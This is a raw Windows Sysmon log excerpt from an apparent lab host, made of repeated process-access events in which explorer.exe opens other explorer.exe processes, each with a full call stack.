16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 